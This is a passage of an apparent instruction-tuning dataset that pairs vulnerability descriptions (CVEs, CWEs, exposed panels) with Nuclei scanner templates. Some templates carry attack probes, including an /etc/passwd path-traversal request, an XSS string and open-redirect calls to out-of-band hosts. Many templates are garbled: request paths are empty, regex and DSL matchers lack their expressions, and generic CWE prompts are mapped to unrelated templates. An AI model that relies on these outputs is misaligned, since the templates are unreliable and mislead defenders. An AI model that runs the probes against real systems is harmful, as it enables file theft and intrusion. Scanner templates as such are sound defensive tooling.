\" \n part: body\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol", "category": "cve", "severity": "critical", "id": "CVE-2021-46422"}
{"instruction": "Generate a Nuclei template for: Ncast HD Intelligent Recording - Arbitrary File Reading", "input": "Title: Ncast HD Intelligent Recording - Arbitrary File Reading\nSummary: Ncast HD Intelligent Recording - Arbitrary File Reading. Ncast HD intelligent recording and broadcasting system has an arbitrary file reading vulnerability.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: ncast-lfi\n\ninfo:\n name: Ncast HD Intelligent Recording - Arbitrary File Reading\n author: pussycat0x\n severity: high\n description: Ncast HD intelligent recording and broadcasting system has an arbitrary file reading vulnerability.\n tags: ncast,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/developLog/downloadLog.php?name=../../../../etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"application/force-download\" \n part: content_type\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "ncast-lfi"}
{"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: apollo-adminservice-unauth\n\ninfo:\n name: Apollo Admin Service - Unauthenticated Access\n author: j4vaovo\n severity: medium\n description: ApolloAdminservice was able to be accessed without authentication.\n tags: misconfig,unauth,apollo,apolloadminservice,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/apps\" \n matchers:\n - type: word\n words:\n - \"appId\" \n - \"orgName\" \n - \"ownerName\" \n - \"dataChangeCreatedBy\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: keycloak-openid-config\n\ninfo:\n name: Keycloak OpenID Configuration - Detect\n author: rodnt\n severity: info\n description: Keycloak Openid configuration information was detected.\n tags: keycloak,config,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.well-known/openid-configuration\" \n - \"{{BaseURL}}/auth/realms/master/.well-known/openid-configuration\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"issuer\" \n - \"authorization_endpoint\" \n - \"token_endpoint\" \n - \"userinfo_endpoint\" \n - \"jwks_uri\" \n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for: Meilisearch - Detect", "input": "Title: Meilisearch - Detect\nSummary: Meilisearch - Detect. An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: meilisearch-detect\n\ninfo:\n name: Meilisearch - Detect\n author: userdehghani\n severity: info\n description: An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience.\n tags: meilisearch,detect,tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "meilisearch-detect"}
{"instruction": "Generate a Nuclei template for CVE-2023-29204", "input": "Title: Vulnerability (CWE-601) in xwiki xwiki\nSummary: XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to bypass the existing security measures put in place to avoid open redirect by using a redirect such as `//mydomain.com` (i.e. omitting the `http:`). It was also possible to bypass it when using URL such as `http:/mydomain.com`. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1.\n\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: xwiki xwiki\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-29204\n\ninfo:\n name: XWiki - Open Redirect\n author: ritikchaddha\n severity: medium\n description: XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to bypass the existing security measures put in place to avoid open redirect by using a redirect such as `//mydomain.com` (i.e. omitting the `http:`). It was also possible to bypass it when using URL such as `http:/mydomain.com`. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1.\n tags: cve,cve2023,xwiki,redirect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me\" \n - \"{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2023-29204"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: parallels-html-client\n\ninfo:\n name: Parallels HTML5 Client Login Panel - Detect\n author: pdteam\n severity: info\n description: Parallels HTML5 Client login panel was detected.\n tags: panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/RASHTML5Gateway/\" \n matchers:\n - type: word\n words:\n - \"Parallels HTML5 Client\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for: DigitalOcean Personal Access Token", "input": "Title: DigitalOcean Personal Access Token\nSummary: DigitalOcean Personal Access Token. Tags: digitalocean, exposure, token\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: digital-ocean-personal-token\n\ninfo:\n name: DigitalOcean Personal Access Token\n author: DhiyaneshDK\n severity: info\n description: DigitalOcean Personal Access Token\n tags: digitalocean,exposure,token,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "digital-ocean-personal-token"}
{"instruction": "Generate a Nuclei template for: Pantheon upstream.yml Disclosure", "input": "Title: Pantheon upstream.yml Disclosure\nSummary: Pantheon upstream.yml Disclosure. Public Pantheon YAML Configuration Files might include sensitive info\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: pantheon-upstream\n\ninfo:\n name: Pantheon upstream.yml Disclosure\n author: DhiyaneshDK\n severity: low\n description: Public Pantheon YAML Configuration Files might include sensitive info\n tags: exposure,devops,patheon,config,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pantheon.upstream.yml\" \n matchers:\n - type: word\n words:\n - \"database:\" \n - \"protected_web_paths:\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "pantheon-upstream"}
{"instruction": "Generate a Nuclei template for CVE-2023-36284", "input": "Title: SQL Injection in webkul qloapps\nSummary: An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: webkul qloapps\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-36284\n\ninfo:\n name: QloApps 1.6.0 - SQL Injection\n author: ritikchaddha\n severity: high\n description: An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database.\n tags: time-based-sqli,cve,cve2023,qloapps,sqli,webkul,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"QloApps\" \n part: body\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2023-36284"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: vertex-tax-panel\n\ninfo:\n name: Vertex Tax Installer Panel - Detect\n author: ritikchaddha\n severity: info\n description: Vertex Tax Installer panel was detected.\n tags: panel,vertex,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Vertex Tax Installer\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for CVE-2023-6421", "input": "Title: Vulnerability (CWE-522) in w3eden download_manager\nSummary: The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.\nVulnerability Type: Vulnerability (CWE-522)\nSeverity: high\nAffected Products: w3eden download_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-6421\n\ninfo:\n name: WordPress Download Manager - File Password Exposure\n author: ritikchaddha\n severity: medium\n description: The WordPress Download Manager plugin contains a vulnerability that allows attackers to obtain passwords for password-protected downloads by sending a specially crafted request to the validate-password API endpoint.\n tags: cve,cve2023,wp,wordpress,wp-plugin,exposure,download-manager,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"success\"\" \n - \"op\":\"\" \n - \"Wrong Password\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-6421"}
{"instruction": "Generate a Nuclei template for CVE-2020-5191", "input": "Title: Cross-Site Scripting (XSS) in phpgurukul hospital_management_system\nSummary: PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: phpgurukul hospital_management_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-5191\n\ninfo:\n name: PHPGurukul Hospital Management System - Cross-Site Scripting\n author: TenBird\n severity: medium\n description: PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n tags: cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \" | \" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2020-5191"}
{"instruction": "Generate a Nuclei template for CVE-2022-37190", "input": "Title: Unknown Vulnerability in cuppacms cuppacms\nSummary: CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from \"/api/index.php.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: cuppacms cuppacms\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-37190\n\ninfo:\n name: Cuppa CMS v1.0 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from \"/api/index.php.\n tags: cve2022,cve,rce,cuppa,authenticated,cuppacms,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"text/html\" \n part: header_3\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-37190"}
{"instruction": "Generate a Nuclei template for CVE-2022-30525", "input": "Title: OS Command Injection in zyxel usg_flex_100w_firmware and others\nSummary: A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: zyxel usg_flex_100w_firmware, zyxel usg_flex_200_firmware, zyxel usg_flex_500_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-30525\n\ninfo:\n name: Zyxel Firewall - OS Command Injection\n author: h1ei1,prajiteshsingh\n severity: critical\n description: An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\n tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: status\n status:\n - 500", "category": "cve", "severity": "critical", "id": "CVE-2022-30525"}
{"instruction": "Generate a Nuclei template to detect Open Redirect", "input": "Title: Open Redirect (CWE-601)\nSummary: The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.\nVulnerability Type: Open Redirect\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: shibboleth-open-redirect\n\ninfo:\n name: Shibboleth SSO - Open Redirect\n author: aushack\n severity: medium\n description: Shibboleth SSO contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: redirect,shibboleth,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Shibboleth.sso/Logout?return=https://{{randstr}}.interact.sh\" \n matchers:\n - type: regex\n part: header\n - type: status\n status:\n - 302", "category": "cwe", "severity": "high", "id": "CWE-601"}
{"instruction": "Generate a Nuclei template for: Kiteworks PCN Panel - Detect", "input": "Title: Kiteworks PCN Panel - Detect\nSummary: Kiteworks PCN Panel - Detect. Kiteworks PCN Login Panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: kiteworks-pcn-panel\n\ninfo:\n name: Kiteworks PCN Panel - Detect\n author: righettod\n severity: info\n description: Kiteworks PCN Login Panel was detected.\n tags: panel,kiteworks,login,detect,accellion,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login/locales/login_en.json\" \n matchers:\n - type: word\n words:\n - \"Secured by Kiteworks\" \n - \"Return to sign in\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/octet-stream\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "kiteworks-pcn-panel"}
{"instruction": "Generate a Nuclei template for: Salesforce Tableau Server - Detect", "input": "Title: Salesforce Tableau Server - Detect\nSummary: Salesforce Tableau Server - Detect. Detects Salesforce Tableau Server and extracts the buildid.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: tableau-server-detect\n\ninfo:\n name: Salesforce Tableau Server - Detect\n author: TechbrunchFR,aringo\n severity: info\n description: Detects Salesforce Tableau Server and extracts the buildid.\n tags: tech,detect,tableau,salesforce,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"X-Tableau: Tableau Server\" \n - \"Server: Tableau\" \n part: header\n condition: or\n - type: word\n words:\n - \"VizPortalRun\" \n - \"vizportal\" \n part: body\n condition: or", "category": "generic", "severity": "info", "id": "tableau-server-detect"}
{"instruction": "Generate a Nuclei template for: SpaceLogic C-Bus Home Panel - Detect", "input": "Title: SpaceLogic C-Bus Home Panel - Detect\nSummary: SpaceLogic C-Bus Home Panel - Detect. Tags: panel, spacelogic, login\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: spacelogic-cbus-panel\n\ninfo:\n name: SpaceLogic C-Bus Home Panel - Detect\n author: ritikchaddha\n severity: info\n description: SpaceLogic C-Bus Home Panel - Detect\n tags: panel,spacelogic,login,schneider-electric,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"SpaceLogic C-Bus Home\" \n - \"content=\"SpaceLogic C-Bus Home\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "spacelogic-cbus-panel"}
{"instruction": "Generate a Nuclei template to detect Unrestricted Upload of File with Dangerous Type", "input": "Title: Unrestricted Upload of File with Dangerous Type (CWE-434)\nSummary: The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.\nVulnerability Type: Unrestricted Upload of File with Dangerous Type\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: roxyfileman-fileupload\n\ninfo:\n name: Roxy Fileman 1.4.4 - Arbitrary File Upload\n author: DhiyaneshDK\n severity: high\n description: Roxy Fileman 1.4.4 is susceptible to remote code execution via the FORBIDDEN_UPLOADS setting, which is checked when renaming an existing file to a new file extension. An attacker can bypass this check and rename already uploaded files to any extension using the move function, which does not perform any checks.\n tags: misconfig,edb,roxy,fileman,rce,fileupload,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-434"}
{"instruction": "Generate a Nuclei template for CVE-2023-1698", "input": "Title: OS Command Injection in wago compact_controller_100_firmware and others\nSummary: In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: wago compact_controller_100_firmware, wago edge_controller_firmware, wago pfc100_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-1698\n\ninfo:\n name: WAGO - Remote Command Execution\n author: xianke\n severity: critical\n description: In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.\n tags: cve2023,cve,wago,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"license\":\" \n - \"\"name\":\" \n - \"uid=\" \n - \"gid=\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2023-1698"}
{"instruction": "Generate a Nuclei template for CVE-2018-11133", "input": "Title: Cross-Site Scripting (XSS) in quest kace_system_management_appliance\nSummary: The 'fmt' parameter of the '/common/run_cross_report.php' script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: quest kace_system_management_appliance\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-11133\n\ninfo:\n name: Quest KACE SMA /common/run_cross_report.php 'fmt' XSS\n author: iamnoooob,pdresearch\n severity: medium\n description: The 'fmt' parameter of the '/common/run_cross_report.php' script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting.\n tags: cve,cve2018,xss,quest,kace,sma,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"xls34403');alert(document.domain)//952');\" \n - \"k-run-report-message\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2018-11133"}
{"instruction": "Generate a Nuclei template for: Security Center Plan - Disabled", "input": "Title: Security Center Plan - Disabled\nSummary: Security Center Plan - Disabled. Ensure your Alibaba Cloud Security Center is on the Advanced or Enterprise Edition for enhanced security features like malware detection, webshell identification, and anomaly recognition. Upgrading provides critical protection against undetected threats.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: security-plan-disabled\n\ninfo:\n name: Security Center Plan - Disabled\n author: DhiyaneshDK\n severity: medium\n description: Ensure your Alibaba Cloud Security Center is on the Advanced or Enterprise Edition for enhanced security features like malware detection, webshell identification, and anomaly recognition. Upgrading provides critical protection against undetected threats.\n tags: cloud,devops,aliyun,alibaba,alibaba-cloud-config,security-center\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "security-plan-disabled"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: kwejkpl\n\ninfo:\n name: Kwejk.pl User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Kwejk.pl user name information check was conducted.\n tags: osint,osint-images,kwejkpl,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://kwejk.pl/uzytkownik/{{user}}#/tablica/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Kwejki u\u017cytkownika\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for: Jira Unauthenticated Installed gadgets", "input": "Title: Jira Unauthenticated Installed gadgets\nSummary: Jira Unauthenticated Installed gadgets. Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets)\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: jira-unauthenticated-installed-gadgets\n\ninfo:\n name: Jira Unauthenticated Installed gadgets\n author: philippedelteil\n severity: info\n description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets)\n tags: atlassian,jira,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/rest/config/1.0/directory\" \n matchers:\n - type: word\n words:\n - \"jaxbDirectoryContents\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "jira-unauthenticated-installed-gadgets"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mastodon-polsocial\n\ninfo:\n name: Mastodon-pol.social User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Mastodon-pol.social user name information check was conducted.\n tags: osint,osint-social,mastodon-polsocial,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://pol.social/@{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"@pol.social\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for: MongoD Server - Exposure", "input": "Title: MongoD Server - Exposure\nSummary: MongoD Server - Exposure. Tags: mongod, exposure, info-leak\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: mongod-exposure\n\ninfo:\n name: MongoD Server - Exposure\n author: DhiyaneshDk\n severity: low\n description: MongoD Server - Exposure\n tags: mongod,exposure,info-leak,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"mongod\" \n - \"List all commands\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "mongod-exposure"}
{"instruction": "Generate a Nuclei template for: Open Journal Systems Installer - Exposure", "input": "Title: Open Journal Systems Installer - Exposure\nSummary: Open Journal Systems Installer - Exposure. Open Journal Systems is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: ojs-installer\n\ninfo:\n name: Open Journal Systems Installer - Exposure\n author: DhiyaneshDK\n severity: high\n description: Open Journal Systems is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,ojs,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index/install\" \n - \"{{BaseURL}}/index.php/index/install\" \n matchers:\n - type: word\n words:\n - \"OJS Installation\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "ojs-installer"}
{"instruction": "Generate a Nuclei template for CVE-2019-2578", "input": "Title: Unknown Vulnerability in oracle webcenter_sites\nSummary: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. While the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data. CVSS 3.0 Base Score 8.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N).\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: oracle webcenter_sites\nIndicators: unauthorized", "output": "id: CVE-2019-2578\n\ninfo:\n name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control\n author: leovalcante\n severity: high\n description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.\n tags: cve,cve2019,oracle,wcs,auth-bypass,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body", "category": "cve", "severity": "high", "id": "CVE-2019-2578"}
{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: geo-webserver-detect\n\ninfo:\n name: GeoWebServer Detector Panel - Detect\n author: dhiyaneshDK,daffainfo\n severity: info\n description: GeoWebServer Detector panel was detected.\n tags: panel,geowebserver,tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"GeoWebServer\"", "category": "cwe", "severity": "medium", "id": "CWE-200"}
{"instruction": "Generate a Nuclei template for CVE-2022-2733", "input": "Title: Cross-Site Scripting (XSS) in open-emr openemr\nSummary: Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: open-emr openemr\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-2733\n\ninfo:\n name: Openemr < 7.0.0.1 - Cross-Site Scripting\n author: ctflearner\n severity: medium\n description: Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1.\n tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \" \" \n - \"pricelevel\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-2733"}
{"instruction": "Generate a Nuclei template for: Minimize container added capabilities", "input": "Title: Minimize container added capabilities\nSummary: Minimize container added capabilities. Checks for containers in Kubernetes Deployments with added capabilities beyond the default set, increasing security risks.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: minimize-added-capabilities\n\ninfo:\n name: Minimize container added capabilities\n author: princechaddha\n severity: high\n description: Checks for containers in Kubernetes Deployments with added capabilities beyond the default set, increasing security risks.\n tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "minimize-added-capabilities"}
